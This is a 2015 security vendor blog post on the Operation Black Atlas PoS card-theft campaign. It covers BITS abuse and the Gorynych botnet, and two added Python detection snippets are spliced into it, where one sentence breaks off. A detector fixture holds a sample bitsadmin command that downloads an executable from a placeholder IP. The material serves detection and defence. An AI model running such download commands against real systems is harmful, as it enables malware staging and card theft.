## Operation Black Atlas, Part 2: Tools and Malware Used and How to Detect Them

**Posted on:** [December 18, 2015](http://blog.trendmicro.com/trendlabs-security-intelligence/2015/12/) at 6:21 am
**Posted in:** [Botnets](http://blog.trendmicro.com/trendlabs-security-intelligence/category/botnets/), [Malware](http://blog.trendmicro.com/trendlabs-security-intelligence/category/malware/)
**Author:** Erika Mendoza and Jay Yaneza (Threats Analysts)

_This is the second part of our two-part blog series on Operation Black Atlas. The first blog entry is entitled Operation Black Atlas Endangers In-Store Card Payments and SMBs Worldwide; Switches between BlackPOS and Other Tools._

Operation Black Atlas has already spread to a multi-state healthcare provider, dental clinics, a machine manufacturer, a technology company focusing on insurance services, a gas station that has a multi-state presence, and a beauty supply shop.
It continues to spread across small and medium-sized businesses across the globe, using the modular Gorynych/Diamond Fox botnet to exfiltrate stolen data.

_Figure 1. Operation Black Atlas infection chain_

**_Initial Compromise via Pen Testing Tools_**

The operation uses a variety of penetration testing tools that are available online to probe and penetrate their target’s environment. The first set of tools is for scanning and creating a test plan, and often uses brute-force or dictionary attacks to break passwords. The second set of tools is for executing the plan, and mainly targets remote access services, like the VNC Viewer, the remote desktop protocol (RDP), and the built-in Windows Remote Desktop Connection (RDC).

All that stands between the organization and the attacker is a weak password.
It is harder to determine lateral movement once user credentials are stolen and used, because the tools used would not be considered malicious. Network defenders must enforce stricter policies on password creation and maintenance or deploy password manager software. They can also configure breach detection systems to log activities like port or vulnerability scanning or brute-force attempts for inspection.

**_BITS and Pieces of POS and Spying Threats_**

Once the cybercriminals have scoped the network, they will then introduce PoS threats. They do this by abusing a legitimate function, the Windows Background Intelligent Transfer Service (BITS) or bitsadmin.exe, which can be used to transfer files to and from Microsoft and is typically used to download updates to systems.
[It can easily bypass firewalls and has long been used by malware to sneak in malicious downloads.](http://arstechnica.com/information-technology/2007/05/malware-piggybacks-on-windows-background-intelligent-transfer-service/)

In the case of Black Atlas, cybercriminals use BITS to download [NewPOSThings](http://blog.trendmicro.com/trendlabs-security-intelligence/newposthings-has-new-pos-things/), a PoS malware family notable for its RAM scraper, keylogger, keep-alive reporting, and data transfer routines. The operation can also load a variant of Neutrino or [Kasidet](http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/), which has PoS card-scraping functionality. We also saw BlackPOS, CenterPOS, Project Hook, and [PwnPOS](http://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/) being used in cases related to the operation. All these PoS threats are available in the cybercriminals’ servers.

As such, IT administrators should stay up to date on known and latest PoS malware.
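One way to surface the bitsadmin.exe abuse described above in process-creation telemetry, as an added example that is not code from the original post or from Trend Micro: the Sysmon-style records, the host allowlist and the addresses are all constructed, and the `/transfer` and `/addfile` verbs are the real bitsadmin switches that stage a download.

```python
import re
from urllib.parse import urlparse

# Constructed process-creation records in Sysmon Event ID 1 style. None of the
# paths, hosts or addresses come from the original post or its IOC document.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"bitsadmin /transfer job1 /download /priority high http://203.0.113.7/upd/svc.exe C:\Windows\Temp\svc.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"bitsadmin /list /allusers"},
    {"Image": r"C:\Windows\System32\svchost.exe", "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": r"svchost.exe -k netsvcs -p -s BITS"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"bitsadmin /addfile j2 http://wsus.corp.example/Content/abc.cab C:\Temp\abc.cab"},
]

ALLOWED_HOSTS = {"wsus.corp.example"}          # assumed: update sources BITS may legitimately pull from
DOWNLOAD_VERBS = ("/transfer", "/addfile")     # bitsadmin verbs that stage a download onto the host
RISKY_EXT = (".exe", ".dll", ".scr", ".ps1", ".bat", ".vbs")  # destinations worth a second look
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)

def assess_event(ev):
    """Return (verdict, reason) for one record; verdict is ok, review or alert."""
    if not ev["Image"].lower().endswith("bitsadmin.exe"):
        return "ok", "not bitsadmin"
    cmd = ev["CommandLine"]
    if not any(v in cmd.lower() for v in DOWNLOAD_VERBS):
        return "ok", "bitsadmin without a download verb"
    urls = URL_RE.findall(cmd)
    if not urls:
        return "review", "download verb but no URL on the command line"
    host = urlparse(urls[0]).hostname or ""
    if host not in ALLOWED_HOSTS:
        return "alert", f"BITS download from non-allowlisted host {host}"
    if cmd.split()[-1].lower().endswith(RISKY_EXT):
        return "review", "allowlisted source but executable destination"
    return "ok", "allowlisted update source"

def triage(events):
    """Run every record through assess_event and keep the command line for context."""
    return [(ev["CommandLine"], *assess_event(ev)) for ev in events]
```

Only the first record trips an alert; the service host and the administrative `/list` call stay quiet, and the WSUS-sourced `.cab` passes the allowlist.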
We have provided a complete list of indicators of compromise (IOCs) that can betray the presence of these threats in the

There is a new player in the card theft game that changes it altogether: Gorynych or the Diamond Fox botnet malware. BKDR_GORYNYCH may not technically be considered a PoS malware, as it is not entirely designed for PoS systems and is also being used outside of the Black Atlas operation. However, cybercriminals running Black Atlas have built a copy that can specifically look for the output file of the BlackPoS malware, which is the one that harvested the credit card data from the targets in the first place. The fact that the images in Gorynych’s control panel were named “Kartoxa,” which also refers to BlackPoS, further proves the link between the two malware and the operation.

Aside from the PoS plugin, other modules usually downloaded from a subdirectory in the C&C server make up this malware’s entirety. These include plugins for getting screenshots, passwords, mails, and more. Without the plugins, Gorynych routines mostly focus on anti-analysis, information theft, and installations. In the Diamond Fox builder, the keylogger and PoS grabber functionalities are disabled by default.
However, with Operation Black Atlas, these options were turned on, which proves that the cybercriminals running this are intentionally targeting PoS systems.

_Figure 2. Diamond Fox or Gorynych builder_

After downloading its plugins, Gorynych reports to its server via gate.php using HTTP POST. It uses its own user-agent that can be found in its configuration file. The parameters consist of system information used to profile the bot, mainly for identification in the Gorynych control panel. The posted information is encrypted using a simple XOR operation. Hashes, addresses, and other indicators related to Gorynych can be found in the IOC document provided below.

**_Recommendations_**

Every network has its own nuances and patterns. As such, applying a single PoS strategy and hoping for the best is out of the question. Our prior research on PoS threats showed us that the best way to handle them is by evaluating which best-known strategies and defensive technologies can best enhance the existing network environment.

Trend Micro is monitoring this ongoing activity, and will make follow-up reports on this if necessary. Additional technical details can be found in the [Technical Brief](http://documents.trendmicro.com/assets/Operation_Black Atlas_Technical_Brief.pdf). The indicators of compromise are uploaded in the [Black Atlas IOC document](http://documents.trendmicro.com/assets/Operation Black Atlas_Indicators_of_Compromise.pdf).

Network segmentation and isolation of the cardholder data environment from other networks should be standard for organizations of all sizes. For large organizations, it is important to eliminate unnecessary data and monitor what’s left. It is also best to ensure that essential controls are running via regular security checks.
IT admins need to monitor and mine event logs.

Meanwhile, smaller organizations should implement a firewall or ACL on remote access services and change the default credentials of PoS systems and other internet-facing devices. They should also ensure that third-party vendors handling the items mentioned have done so properly. However, other essential controls on passwords and network/system security and monitoring of logs used by larger organizations can also be applied. No matter what the size of the organization, what’s important is to evaluate your threat landscape to prioritize your treatment strategy.

To enhance the network’s security posture on point-of-sale systems, IT admins can read about 26 defensive technologies and strategies outlined in our paper, Defending Against PoS RAM Scrapers: Current Strategies and Next-Gen Technologies, as well as our write-up on Protecting Point of Sales Systems from PoS Malware.

To stop breaches on point-of-sale systems (or any other PoS environment, for that matter), Trend Micro™ Custom Defense™ employs a family of solutions that can detect, analyze, and respond to advanced malware and other attack techniques.
[Endpoint Application Control](http://www.trendmicro.com/us/enterprise/product-security/endpoint-application-control/) can reduce attack exposure by ensuring that only updates associated with whitelisted applications can be installed, helping you safeguard your data and machines against unauthorized access and user error.
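To connect the Gorynych check-in described earlier (HTTP POST to gate.php, a custom user-agent, an XOR-protected body) with the recommendation to mine logs, here is an added example that is not code from the original post or from Trend Micro. It flags gate.php POSTs carrying a user-agent outside an assumed fleet allowlist in constructed proxy log lines, and shows why a single-key XOR body yields to an analyst holding the key from the sample's configuration; the log layout, hosts, key and body are all constructed.

```python
import re
from collections import Counter

# Constructed proxy log lines ("client method url status user-agent"); no value
# here comes from the original post or the Black Atlas IOC document.
PROXY_LOG = """\
10.1.20.15 POST http://203.0.113.9/panel/gate.php 200 "SampleBot/1.0"
10.1.20.15 GET http://203.0.113.9/panel/plugins/pos.bin 200 "SampleBot/1.0"
10.1.20.31 GET http://cdn.example.net/app.js 200 "Mozilla/5.0 (Windows NT 6.1)"
10.1.20.44 POST http://billing.example.com/gate.php 200 "Mozilla/5.0 (Windows NT 6.1)"
10.1.20.15 POST http://203.0.113.9/panel/gate.php 200 "SampleBot/1.0"
"""
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')
KNOWN_UA_PREFIXES = ("Mozilla/",)   # assumed allowlist of user-agents the fleet emits

def parse(log_text):
    """Turn the constructed log layout into dicts; lines that do not fit are skipped."""
    recs = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            client, method, url, status, ua = m.groups()
            recs.append({"client": client, "method": method, "url": url,
                         "status": int(status), "ua": ua})
    return recs

def suspicious_checkins(records):
    """POSTs to a gate.php path whose user-agent is outside the allowlist."""
    return [(r["client"], r["url"], r["ua"]) for r in records
            if r["method"] == "POST" and r["url"].lower().endswith("/gate.php")
            and not r["ua"].startswith(KNOWN_UA_PREFIXES)]

def checkin_counts(hits):
    """Repeated hits from one client are what a periodic reporter looks like."""
    return Counter(client for client, _, _ in hits)

def xor_bytes(data, key):
    """Repeating-key XOR; applying it twice with the same key restores the input."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def recover_key(ciphertext, known_prefix):
    """Known-plaintext recovery: XOR of the ciphertext with the plaintext it must
    start with yields the key bytes covering that prefix (the whole key if short)."""
    return xor_bytes(ciphertext[:len(known_prefix)], known_prefix)

# Constructed check-in body protected with a constructed 3-byte key.
SAMPLE_KEY = b"k3y"
SAMPLE_BODY = xor_bytes(b"id=WS-POS-02&os=6.1&plugins=pos,keylog", SAMPLE_KEY)

def decode_body(body, key):
    """Decode a captured body once the key is known or recovered."""
    return xor_bytes(body, key).decode("ascii", errors="replace")
```

The billing-site POST with a browser user-agent is left alone, which is the point of pairing the path match with the user-agent check rather than alerting on gate.php by itself.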